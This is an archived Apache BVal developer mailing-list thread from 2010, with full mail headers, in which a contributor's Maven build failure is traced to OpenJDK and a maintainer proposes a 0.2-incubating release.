X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:date:message-id :subject:from:to:content-type; bh=QPG79BlE/qnUFhroRqq8ORaYaleF9nFu3VBOOwjCjbg=; b=vnYyLoGMtnDNuffBLYr9+h9BkDi/8m7JmFVRlafBkJM+SbwpP5B5vqfmLSmiafbJ6k 1QRoHT1B8YiBavHoIkmb3w0IpCNabYSGNSNyjk/RCWQtpsrKPX9F/7jwA2Ad7tgb/s6Q oQ5lxh9ef+01ipJ0cIwnpFyzFoTDqCubMoys8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=iOs7ssnR9obWfnK2UNE5SUik5CnJbBT81qDhu0tsxGtWly36hkdHILD6KGHilP8NLo Jia8myRA2nuqjdPlc3vCsH8vYJNmGmaI4eRoNxr89oFFx+7pk7Wc7TEADbcwSNJLEjs7 VTrvp5HCi4uPNK7wOYkgrIQf55GZWpAx09xWE= MIME-Version: 1.0 Date: Mon, 19 Jul 2010 12:26:07 -0400 Message-ID: <[email protected]> Subject: compilation issue From: Karan Malhi <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=0015175cdfb699ece1048bc00611 X-Virus-Checked: Checked by ClamAV on apache.org --0015175cdfb699ece1048bc00611 Content-Type: text/plain; charset=ISO-8859-1 I checked out sources and did mvn clean install, but build failed to compile. Here is the partial output: [ERROR] BUILD FAILURE [INFO] ------------------------------------------------------------------------ [INFO] Compilation failure /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/BootstrapTest.java:[122,27] incompatible types; inferred type argument(s) java.lang.Object do not conform to bounds of type variable(s) T found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> required: java.lang.Object /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/CustomConstraintValidatorFactoryTest.java:[67,73] incompatible types; inferred type argument(s) java.lang.Object do not conform to bounds of type variable(s) T found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> required: java.lang.Object /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/xml/ValidationParserTest.java:[68,35] incompatible types; inferred type argument(s) java.lang.Object do not conform to bounds of type variable(s) T found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> required: java.lang.Object -- Karan Singh Malhi --0015175cdfb699ece1048bc00611-- From [email protected] Mon Jul 19 20:05:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79118 invoked from network); 19 Jul 2010 20:05:53 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Jul 2010 20:05:53 -0000 Received: (qmail 88566 invoked by uid 500); 19 Jul 2010 20:05:53 -0000 Delivered-To: [email protected] Received: (qmail 88538 invoked by uid 500); 19 Jul 2010 20:05:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88530 invoked by uid 99); 19 Jul 2010 20:05:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jul 2010 20:05:53 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp109.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 19 Jul 2010 20:05:45 +0000 Received: (qmail 12836 invoked from network); 19 Jul 2010 20:04:24 -0000 Received: from drwoods.local ([email protected] with plain) by smtp109.prem.mail.ac4.yahoo.com with SMTP; 19 Jul 2010 13:04:24 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: kceTs0sVM1l2s5YEPhczfv_R2SYO4zciOrRu_tjEe2MGeCq mzg379m.M31TbMatRkpqPkVuEv3TK78Funo.RroV4hm9gIlcIYiM1lHa0uZE tLpAaX_XLajpeZ3imZW.TIAQMNag8OnRyt5CM_klpWdlJQDhOFpxgqpEo.Xl 35EIueQBOU.6HuTr7PawEDi8CyjwKT5aycMd04bAepAyVu4iZcWVu1iRB69d bEWkKeZss4w695g7Y7cW_NdyTMNSJroKwP0hPJUNqh7YtBUYLuiF1EMWsLq9 dK.p2u9EkssrNOwv.9_.084c.t4IyN2oaeTVbXCYtHxQaAWyYK1jVsQ-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Mon, 19 Jul 2010 16:04:24 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] CC: Karan Malhi <[email protected]> Subject: Re: compilation issue References: <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org What version of Maven and Java are you using? I just rebuilt trunk using "mvn clean install" and it worked for me on MacOSX with Maven 2.2.1 and Java 1.6.0_20. -Donald On 7/19/10 12:26 PM, Karan Malhi wrote: > I checked out sources and did mvn clean install, but build failed to > compile. Here is the partial output: > > [ERROR] BUILD FAILURE > [INFO] > ------------------------------------------------------------------------ > [INFO] Compilation failure > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/BootstrapTest.java:[122,27] > incompatible types; inferred type argument(s) java.lang.Object do not > conform to bounds of type variable(s) T > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > required: java.lang.Object > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/CustomConstraintValidatorFactoryTest.java:[67,73] > incompatible types; inferred type argument(s) java.lang.Object do not > conform to bounds of type variable(s) T > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > required: java.lang.Object > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/xml/ValidationParserTest.java:[68,35] > incompatible types; inferred type argument(s) java.lang.Object do not > conform to bounds of type variable(s) T > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > required: java.lang.Object > > From [email protected] Mon Jul 19 23:07:18 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59555 invoked from network); 19 Jul 2010 23:07:18 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Jul 2010 23:07:18 -0000 Received: (qmail 41154 invoked by uid 500); 19 Jul 2010 23:07:18 -0000 Delivered-To: [email protected] Received: (qmail 41115 invoked by uid 500); 19 Jul 2010 23:07:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 43942 invoked by uid 99); 19 Jul 2010 20:47:37 -0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:cc:content-type; bh=EAn2IFOHLJWgkcR8Xcceziu6KIg6S/sRzy6gZoiSboI=; b=g04XYFmGR9wd8/7ikMMBfR2Ywe69fdzbwhYHEU1gH32d0sWKlWnAQ3279VH04/PVUK 4+6fE45DXBlwBgrY137r+XNBcNovTV5Qk82NxOIA4ul64mZw8AWc29oyuL0LJ7giahTF m9LI0FK6aICxXRaiuLpAMbFwbDW9Ld6oydwXc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; b=SMXvAzm2iWho+vUXnAkTLMOuaaOvAE/olLuIoqbHsY34JvwD8eDD6C+qrNRx1SnPsY pwJO4RuN7D2pT2x/10fPUoTGzzgFb7G2wnkrE8xRiqICMoVegyd/X96MHKlMoGjST1qP uaJdFJlyDgwJtX39pzCeTYQ5ggL55EX16Z2Ho= MIME-Version: 1.0 In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Mon, 19 Jul 2010 16:46:07 -0400 Message-ID: <[email protected]> Subject: Re: compilation issue From: Karan Malhi <[email protected]> To: Donald Woods <[email protected]> Cc: [email protected] Content-Type: multipart/alternative; boundary=0016367b6c887839ef048bc3a86a X-Virus-Checked: Checked by ClamAV on apache.org --0016367b6c887839ef048bc3a86a Content-Type: text/plain; charset=ISO-8859-1 Did not send it to the dev list earlier Output of mvn -version ------------------------------------ karan@sabira:~/projects/oss/bval$ mvn -version Apache Maven 2.2.1 (rdebian-1) Java version: 1.6.0_18 Java home: /usr/lib/jvm/java-6-openjdk/jre Default locale: en_US, platform encoding: UTF-8 OS name: "linux" version: "2.6.32-23-generic-pae" arch: "i386" Family: "unix" Output of java-version ------------------------------------ karan@sabira:~/projects/oss/bval$ java -version java version "1.6.0_18" OpenJDK Runtime Environment (IcedTea6 1.8) (6b18-1.8-0ubuntu1) OpenJDK Server VM (build 14.0-b16, mixed mode) Output of svn info -------------------------------- karan@sabira:~/projects/oss/bval$ svn info Path: . URL: https://svn.apache.org/repos/asf/incubator/bval/trunk Repository Root: https://svn.apache.org/repos/asf Repository UUID: 13f79535-47bb-0310-9956-ffa450edef68 Revision: 965614 Node Kind: directory Schedule: normal Last Changed Author: carlosvara Last Changed Rev: 962902 Last Changed Date: 2010-07-10 14:43:44 -0400 (Sat, 10 Jul 2010) On Mon, Jul 19, 2010 at 4:04 PM, Donald Woods <[email protected]> wrote: > What version of Maven and Java are you using? > I just rebuilt trunk using "mvn clean install" and it worked for me on > MacOSX with Maven 2.2.1 and Java 1.6.0_20. > > > -Donald > > > On 7/19/10 12:26 PM, Karan Malhi wrote: > > I checked out sources and did mvn clean install, but build failed to > > compile. Here is the partial output: > > > > [ERROR] BUILD FAILURE > > [INFO] > > ------------------------------------------------------------------------ > > [INFO] Compilation failure > > > > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/BootstrapTest.java:[122,27] > > incompatible types; inferred type argument(s) java.lang.Object do not > > conform to bounds of type variable(s) T > > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > > required: java.lang.Object > > > > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/CustomConstraintValidatorFactoryTest.java:[67,73] > > incompatible types; inferred type argument(s) java.lang.Object do not > > conform to bounds of type variable(s) T > > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > > required: java.lang.Object > > > > > /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/xml/ValidationParserTest.java:[68,35] > > incompatible types; inferred type argument(s) java.lang.Object do not > > conform to bounds of type variable(s) T > > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> > > required: java.lang.Object > > > > > -- Karan Singh Malhi --0016367b6c887839ef048bc3a86a-- From [email protected] Mon Jul 19 23:15:01 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60963 invoked from network); 19 Jul 2010 23:15:00 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Jul 2010 23:15:00 -0000 Received: (qmail 45644 invoked by uid 500); 19 Jul 2010 23:15:00 -0000 Delivered-To: [email protected] Received: (qmail 45611 invoked by uid 500); 19 Jul 2010 23:15:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45603 invoked by uid 99); 19 Jul 2010 23:15:00 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jul 2010 23:15:00 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-vw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 19 Jul 2010 23:14:52 +0000 Received: by vws3 with SMTP id 3so5355073vws.6 for <[email protected]>; Mon, 19 Jul 2010 16:13:31 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:cc:content-type; bh=siOAbcNrcRgcWS1UBkoB4/DJFRuUuhM/UwVfqZ8fA40=; b=XNmisQfTL6ZOEfJs4bNx0x8xnEdvJQ3YwvSGdgV7NsLIvz1OnYnpLeRZpSsWraSaXY fmnhL0WLevHTY/rT2LAUVNzAaVROHicjpwlylapG59griHCoOwLn8gMHzATREpv8lCNv 7ZppJBrWMyXJvzIjtFRp1VMbwQMp+QIXI++sw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :cc:content-type; b=cPQeiUrkfWbIUncSGeXPSaPIVP1g69H/vEJJCVV2WhoelpjWX9SSNP+yZN2RAmZ/yJ oshep6aFLbBgHs46wozRNpKJl4gIbedgP3J6CVokviEKljXugEefRaDTrn/5OSJsC9yv XXbs7vZFXDeXoSaaoVduS4TlUbZw96TKtI0L0= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id q3mr5272813qag.310.1279581208321; Mon, 19 Jul 2010 16:13:28 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 19 Jul 2010 16:13:28 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Mon, 19 Jul 2010 19:13:28 -0400 Message-ID: <[email protected]> Subject: Re: compilation issue From: Karan Malhi <[email protected]> To: Donald Woods <[email protected]> Cc: [email protected] Content-Type: multipart/alternative; boundary=0015175cf7b66220f0048bc5b77d X-Virus-Checked: Checked by ClamAV on apache.org --0015175cf7b66220f0048bc5b77d Content-Type: text/plain; charset=ISO-8859-1 It was an openjdk issue. Switching to sun jdk resolved it On Mon, Jul 19, 2010 at 4:46 PM, Karan Malhi <[email protected]> wrote: > Did not send it to the dev list earlier > > > Output of mvn -version > ------------------------------------ > karan@sabira:~/projects/oss/bval$ mvn -version > > Apache Maven 2.2.1 (rdebian-1) > Java version: 1.6.0_18 > Java home: /usr/lib/jvm/java-6-openjdk/jre > Default locale: en_US, platform encoding: UTF-8 > OS name: "linux" version: "2.6.32-23-generic-pae" arch: "i386" Family: > "unix" > > Output of java-version > ------------------------------------ > karan@sabira:~/projects/oss/bval$ java -version > > java version "1.6.0_18" > OpenJDK Runtime Environment (IcedTea6 1.8) (6b18-1.8-0ubuntu1) > OpenJDK Server VM (build 14.0-b16, mixed mode) > > Output of svn info > -------------------------------- > karan@sabira:~/projects/oss/bval$ svn info > Path: . > URL: https://svn.apache.org/repos/asf/incubator/bval/trunk > Repository Root: https://svn.apache.org/repos/asf > Repository UUID: 13f79535-47bb-0310-9956-ffa450edef68 > Revision: 965614 > Node Kind: directory > Schedule: normal > Last Changed Author: carlosvara > Last Changed Rev: 962902 > Last Changed Date: 2010-07-10 14:43:44 -0400 (Sat, 10 Jul 2010) > > > On Mon, Jul 19, 2010 at 4:04 PM, Donald Woods <[email protected]> wrote: > >> What version of Maven and Java are you using? >> I just rebuilt trunk using "mvn clean install" and it worked for me on >> MacOSX with Maven 2.2.1 and Java 1.6.0_20. >> >> >> -Donald >> >> >> On 7/19/10 12:26 PM, Karan Malhi wrote: >> > I checked out sources and did mvn clean install, but build failed to >> > compile. Here is the partial output: >> > >> > [ERROR] BUILD FAILURE >> > [INFO] >> > ------------------------------------------------------------------------ >> > [INFO] Compilation failure >> > >> > >> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/BootstrapTest.java:[122,27] >> > incompatible types; inferred type argument(s) java.lang.Object do not >> > conform to bounds of type variable(s) T >> > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >> > required: java.lang.Object >> > >> > >> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/CustomConstraintValidatorFactoryTest.java:[67,73] >> > incompatible types; inferred type argument(s) java.lang.Object do not >> > conform to bounds of type variable(s) T >> > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >> > required: java.lang.Object >> > >> > >> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/xml/ValidationParserTest.java:[68,35] >> > incompatible types; inferred type argument(s) java.lang.Object do not >> > conform to bounds of type variable(s) T >> > found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >> > required: java.lang.Object >> > >> > >> > > > > -- > Karan Singh Malhi > -- Karan Singh Malhi --0015175cf7b66220f0048bc5b77d-- From [email protected] Tue Jul 20 01:46:08 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19737 invoked from network); 20 Jul 2010 01:46:08 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 20 Jul 2010 01:46:08 -0000 Received: (qmail 55187 invoked by uid 500); 20 Jul 2010 01:46:08 -0000 Delivered-To: [email protected] Received: (qmail 55153 invoked by uid 500); 20 Jul 2010 01:46:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55145 invoked by uid 99); 20 Jul 2010 01:46:08 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jul 2010 01:46:08 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp102.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 20 Jul 2010 01:46:00 +0000 Received: (qmail 41725 invoked from network); 20 Jul 2010 01:44:39 -0000 Received: from drwoods.local ([email protected] with plain) by smtp102.prem.mail.ac4.yahoo.com with SMTP; 19 Jul 2010 18:44:38 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: e13rnWwVM1kFQGYlcszCLO9RBSidbPYfKaxGYORMzhu1XsI WhMS6mDh5fBXHkPGd8hb6oaNCsc3wdI3IR4kvvMjB0jnmCezhgLN0j1nE938 e0sGGL1bfKNoIKAZOmbmmaImxp5mUVT3CJboYfVSBIUmX4Ljn4Snq6IsZt0Y u9XqAjxBxtHSBxzuxqss5G645YlKcndatblvFNk6q.4BvDrs5cK7ufm2zwLB WhFsIlU8ry3a05qRJOeKW1IDvKWJfWTA1AqX9zKMg.tMe8kXj4bn4tjfaER. E1SfVmQdK2Zw2jROhcLaUAZ5Hfg-- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Mon, 19 Jul 2010 21:44:38 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] CC: Karan Malhi <[email protected]> Subject: Re: compilation issue References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Yep, I'm amazed at the number of OpenJDK issues I've seen reported to OpenJPA and Geronimo mailing lists, which go away when the Sun JDK or IBM SDK is used. Makes you wonder why anyone would ever use it.... -Donald On 7/19/10 7:13 PM, Karan Malhi wrote: > It was an openjdk issue. Switching to sun jdk resolved it > > On Mon, Jul 19, 2010 at 4:46 PM, Karan Malhi <[email protected]> wrote: > >> Did not send it to the dev list earlier >> >> >> Output of mvn -version >> ------------------------------------ >> karan@sabira:~/projects/oss/bval$ mvn -version >> >> Apache Maven 2.2.1 (rdebian-1) >> Java version: 1.6.0_18 >> Java home: /usr/lib/jvm/java-6-openjdk/jre >> Default locale: en_US, platform encoding: UTF-8 >> OS name: "linux" version: "2.6.32-23-generic-pae" arch: "i386" Family: >> "unix" >> >> Output of java-version >> ------------------------------------ >> karan@sabira:~/projects/oss/bval$ java -version >> >> java version "1.6.0_18" >> OpenJDK Runtime Environment (IcedTea6 1.8) (6b18-1.8-0ubuntu1) >> OpenJDK Server VM (build 14.0-b16, mixed mode) >> >> Output of svn info >> -------------------------------- >> karan@sabira:~/projects/oss/bval$ svn info >> Path: . >> URL: https://svn.apache.org/repos/asf/incubator/bval/trunk >> Repository Root: https://svn.apache.org/repos/asf >> Repository UUID: 13f79535-47bb-0310-9956-ffa450edef68 >> Revision: 965614 >> Node Kind: directory >> Schedule: normal >> Last Changed Author: carlosvara >> Last Changed Rev: 962902 >> Last Changed Date: 2010-07-10 14:43:44 -0400 (Sat, 10 Jul 2010) >> >> >> On Mon, Jul 19, 2010 at 4:04 PM, Donald Woods <[email protected]> wrote: >> >>> What version of Maven and Java are you using? >>> I just rebuilt trunk using "mvn clean install" and it worked for me on >>> MacOSX with Maven 2.2.1 and Java 1.6.0_20. >>> >>> >>> -Donald >>> >>> >>> On 7/19/10 12:26 PM, Karan Malhi wrote: >>>> I checked out sources and did mvn clean install, but build failed to >>>> compile. Here is the partial output: >>>> >>>> [ERROR] BUILD FAILURE >>>> [INFO] >>>> ------------------------------------------------------------------------ >>>> [INFO] Compilation failure >>>> >>>> >>> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/BootstrapTest.java:[122,27] >>>> incompatible types; inferred type argument(s) java.lang.Object do not >>>> conform to bounds of type variable(s) T >>>> found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >>>> required: java.lang.Object >>>> >>>> >>> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/CustomConstraintValidatorFactoryTest.java:[67,73] >>>> incompatible types; inferred type argument(s) java.lang.Object do not >>>> conform to bounds of type variable(s) T >>>> found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >>>> required: java.lang.Object >>>> >>>> >>> /home/karan/projects/oss/bval/bval-jsr303/src/test/java/org/apache/bval/jsr303/xml/ValidationParserTest.java:[68,35] >>>> incompatible types; inferred type argument(s) java.lang.Object do not >>>> conform to bounds of type variable(s) T >>>> found : <T>javax.validation.bootstrap.ProviderSpecificBootstrap<T> >>>> required: java.lang.Object >>>> >>>> >>> >> >> >> >> -- >> Karan Singh Malhi >> > > > From [email protected] Tue Jul 20 02:42:23 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41291 invoked from network); 20 Jul 2010 02:42:23 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 20 Jul 2010 02:42:23 -0000 Received: (qmail 1407 invoked by uid 500); 20 Jul 2010 02:42:23 -0000 Delivered-To: [email protected] Received: (qmail 1361 invoked by uid 500); 20 Jul 2010 02:42:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1353 invoked by uid 99); 20 Jul 2010 02:42:22 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 20 Jul 2010 02:42:22 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp109.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 20 Jul 2010 02:42:14 +0000 Received: (qmail 52491 invoked from network); 20 Jul 2010 02:40:53 -0000 Received: from drwoods.local ([email protected] with plain) by smtp109.prem.mail.ac4.yahoo.com with SMTP; 19 Jul 2010 19:40:53 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: d0jD5EQVM1mtt3jGY9OZ9SHK54qmPwWlyZOV025QQjJZVbN uW8E.e35I6d1lStSqsWdenuS3_SUjapgVyQmG89b8mvshPeo26WExb93aOoD 7HWi0zPdE6TspalikOX0BVb6sF6A36TPJVyKn9s0cGSVWDMgy8GEcO1IUOAW 3b5s.Bxkca.J1zYz335fOlSuSRCx5FKNkd9uqzEgf6IyEGpxHSyFfo5Cnyad iclxXrDC2ju.eo7ChywzlsQT9Jt9NoldhlTS_m42uP9qyWQE- X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Mon, 19 Jul 2010 22:40:52 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: [DISCUSS] Time for a 0.2-incubating release? X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Given the Java 5 compile/runtime issue that was discovered after the 0.1-incubating release, I'd prefer that we get a 0.2 release out sooner than later. How about a target of early August for the next release? Any items that we'd like to see included for 0.2? -Donald From [email protected] Wed Jul 21 22:06:05 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16111 invoked from network); 21 Jul 2010 22:06:05 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 21 Jul 2010 22:06:05 -0000 Received: (qmail 28685 invoked by uid 500); 21 Jul 2010 22:06:05 -0000 Delivered-To: [email protected] Received: (qmail 28659 invoked by uid 500); 21 Jul 2010 22:06:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28651 invoked by uid 99); 21 Jul 2010 22:06:05 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jul 2010 22:06:05 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-yw0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 21 Jul 2010 22:05:57 +0000 Received: by ywe9 with SMTP id 9so836664ywe.6 for <[email protected]>; Wed, 21 Jul 2010 15:05:36 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type; bh=oT7IS8PRNqwrCHIXnrSEZ2ikNRJkL8o5A/vdy+FPngY=; b=F+/9Dogyj7bbKzpgXgskblRWP+1jSRBJNFwiLtIwagIg+1VKgln0v4lGzgMRZiVSWT 5ZKmicLjhHsOyDp37u3EIbET3vMKbnMECRLyxPvaxYluVR1wvSRk1z/dSnYikTIodTfq eMYv2UMQySAbj+Xlk98v6dDgbVnbChVbrqmZA= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=JvZc8yUC329w2PqaENDes7+21L2GHwcwWECeQMVDaqYF1k8aGGWQVuUI8uEVfh5j+4 